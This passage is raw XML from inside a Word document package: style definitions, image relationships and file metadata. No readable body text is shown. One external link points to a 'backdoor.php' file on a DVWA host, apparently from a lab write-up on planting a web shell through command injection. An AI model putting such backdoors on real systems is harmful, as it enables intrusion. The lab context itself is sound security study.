      <w:numPr>
        <w:numId w:val="258"/>
        <w:ilvl w:val="4"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:color w:val="244061"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="59">
    <w:name w:val="heading 6"/>
    <w:uiPriority w:val="59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5"/>
      <w:numPr>
        <w:numId w:val="259"/>
        <w:ilvl w:val="5"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:i/>
      <w:color w:val="244061"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="60">
    <w:name w:val="heading 7"/>
    <w:uiPriority w:val="60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0"/>
        <w:ilvl w:val="6"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:i/>
      <w:color w:val="3f3f3f"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="61">
    <w:name w:val="heading 8"/>
    <w:uiPriority w:val="61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1"/>
        <w:ilvl w:val="6"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:color w:val="4f81bd"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="62">
    <w:name w:val="heading 9"/>
    <w:uiPriority w:val="62"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines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200" w:after="0" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:textAlignment w:val="baseline"/>
      <w:outlineLvl w:val="6"/>
      <w:numPr>
        <w:numId w:val="262"/>
        <w:ilvl w:val="6"/>
      </w:numPr>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="맑은 고딕"/>
      <w:i/>
      <w:color w:val="3f3f3f"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="63">
    <w:name w:val="macro"/>
    <w:uiPriority w:val="6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ourier" w:eastAsia="맑은 고딕"/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="64">
    <w:name w:val="Normal"/>
    <w:uiPriority w:val="6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left"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22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image" Target="media/image0.bmp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bmp"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.bmp"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.bmp"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.bmp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" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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bmp"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.bmp"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.bmp"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.bmp"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.bmp"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.bmp"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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bmp"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.bmp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" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.bmp"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.bmp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bmp"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.bmp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hyperlink" Target="http://dvwa.wj.com/vulnerabilities/exec/backdoor.php" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering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</dc:title>
  <dc:creator>python-docx</dc:creator>
  <dc:description>generated by python-docx</dc:description>
  <cp:lastModifiedBy>sinu</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00.000</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-07T05:49:44.052</dcterms:modified>
  <cp:version>0501.0100.01</cp:version>
</cp:coreProperties>
</file>